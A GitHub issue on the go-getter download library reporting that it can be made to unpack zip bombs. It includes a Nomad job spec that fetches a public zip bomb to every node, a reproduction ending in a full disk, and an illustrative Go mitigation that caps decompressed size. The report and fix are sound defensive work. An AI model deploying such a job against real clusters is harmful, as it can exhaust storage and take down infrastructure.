hashicorp / go-getter

Package for downloading things from a string URL using a variety of protocols.
Mozilla Public License 2.0

Vulnerable to Zip bombs. #407

Closed jboero closed 1 year ago

jboero commented 1 year ago

Zip bombs or compression bombs are trick archives that are custom structured to generate terabytes of garbage (or zeros) from a small archive. It turns out go-getter's decompression options and detectors are susceptible to this. This is behaviour by design, but it might be a good idea if go-getter verified an archive's size will fit in storage before decompression. This doesn't just apply to zip files but also xz, zstd, etc. Downloading a zip bomb today is actually detected and blocked by Chrome and some browsers to prevent you from accidentally filling your partition.

A crafty Nomad job of type "system" could instantly bring down an entire Nomad DC if the artifact is downloaded to all nodes and expanded to fill all storage. This pseudojob is missing the exec driver.

job "bomb" {
  type = "system"
  datacenters = ["dc1"]
  group "artifacts" {
    task "server" {
      artifact {
        source      = "https://www.bamsoftware.com/hacks/zipbomb/zblg.zip"
        destination = "/tmp/some-directory"
        options {
          checksum = "md5:207b597f03033b2e0644bbbc29f04053"
        }
      }
    }
  }
}

Beware zip bombs and please use caution if trying to reproduce this: https://www.bamsoftware.com/hacks/zipbomb/

$ ~/go/bin/go-getter https://www.bamsoftware.com/hacks/zipbomb/zblg.zip /tmp/
2023/01/19 13:11:00 Error downloading: write /tmp/1: no space left on device
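The mitigation the report asks for, checking an archive's expansion before and during decompression, as an added example in Go. This is illustrative code written for this page, not go-getter's own implementation; the function names (copyBounded, declaredZipSize, extractZipBounded, gunzipBounded) and the in-memory test archives are assumptions. It shows the two layers a decompressor needs: the zip central directory's declared uncompressed size is a cheap pre-check that can be compared against free space, but those fields are attacker-controlled and formats such as gzip, xz and zstd carry no trustworthy size at all, so the actual bytes written must also be capped with a bounded copy.

```go
package main

import (
	"archive/zip"
	"bytes"
	"compress/gzip"
	"errors"
	"fmt"
	"io"
)

// ErrTooLarge is returned when an archive would expand past the caller's budget.
var ErrTooLarge = errors.New("archive would expand beyond the decompression limit")

// copyBounded copies src into dst but refuses to emit more than limit bytes.
// It works for any decompressing reader (gzip, xz, zstd, a zip entry), which is
// the generic defence when the container format carries no trustworthy size.
func copyBounded(dst io.Writer, src io.Reader, limit int64) (int64, error) {
	// Read one byte past the limit so "exactly limit" and "over limit" differ.
	n, err := io.Copy(dst, io.LimitReader(src, limit+1))
	if err != nil {
		return n, err
	}
	if n > limit {
		return n, ErrTooLarge
	}
	return n, nil
}

// declaredZipSize sums the uncompressed sizes recorded in the central directory.
// Cheap pre-check only: the fields are written by whoever built the archive,
// so extraction must still be bounded by copyBounded.
func declaredZipSize(zr *zip.Reader) uint64 {
	var total uint64
	for _, f := range zr.File {
		total += f.UncompressedSize64
	}
	return total
}

// extractZipBounded expands an in-memory zip into a map, enforcing limit on
// both the declared and the actual output size across all entries.
func extractZipBounded(data []byte, limit int64) (map[string][]byte, error) {
	zr, err := zip.NewReader(bytes.NewReader(data), int64(len(data)))
	if err != nil {
		return nil, err
	}
	if declared := declaredZipSize(zr); declared > uint64(limit) {
		return nil, fmt.Errorf("%w: central directory declares %d bytes, limit %d", ErrTooLarge, declared, limit)
	}
	out := make(map[string][]byte, len(zr.File))
	remaining := limit
	for _, f := range zr.File {
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		var buf bytes.Buffer
		n, err := copyBounded(&buf, rc, remaining)
		rc.Close()
		if err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		remaining -= n
		out[f.Name] = buf.Bytes()
	}
	return out, nil
}

// gunzipBounded decompresses a gzip stream under the same byte budget and
// reports how many bytes were produced before it stopped.
func gunzipBounded(data []byte, limit int64) (int64, error) {
	gr, err := gzip.NewReader(bytes.NewReader(data))
	if err != nil {
		return 0, err
	}
	defer gr.Close()
	return copyBounded(io.Discard, gr, limit)
}

// zeroReader yields an endless stream of zero bytes (constructed test input).
type zeroReader struct{}

func (zeroReader) Read(p []byte) (int, error) {
	for i := range p {
		p[i] = 0
	}
	return len(p), nil
}

// buildZeroZip builds a constructed archive: one entry of `size` zero bytes,
// which deflates to a few KB, the same property a zip bomb exploits.
func buildZeroZip(size int) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, _ := zw.Create("zeros.bin")
	io.Copy(w, io.LimitReader(zeroReader{}, int64(size)))
	zw.Close()
	return buf.Bytes()
}

// buildZeroGzip does the same for a bare gzip stream, which has no size to pre-check.
func buildZeroGzip(size int) []byte {
	var buf bytes.Buffer
	gw := gzip.NewWriter(&buf)
	io.Copy(gw, io.LimitReader(zeroReader{}, int64(size)))
	gw.Close()
	return buf.Bytes()
}

func main() {
	const payload = 8 << 20 // 8 MiB of zeros
	z := buildZeroZip(payload)
	fmt.Printf("zip: %d bytes compressed, declares %d bytes\n", len(z), payload)
	_, err := extractZipBounded(z, 1<<20)
	fmt.Println("extract with 1 MiB limit:", err)
	_, err = extractZipBounded(z, 16<<20)
	fmt.Println("extract with 16 MiB limit:", err)

	g := buildZeroGzip(payload)
	n, err := gunzipBounded(g, 1<<20)
	fmt.Printf("gzip: %d bytes compressed, stopped after %d bytes: %v\n", len(g), n, err)
}
```

The limit passed in would be derived from the destination's free space (or a configured ceiling) rather than a constant; the important property is that the cap is enforced on bytes actually written, so a forged central directory or a sizeless gzip/xz/zstd stream cannot get past it.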
picatz commented 1 year ago

👋 Hello @jboero! In the future, please follow our documented security policy to report vulnerabilities.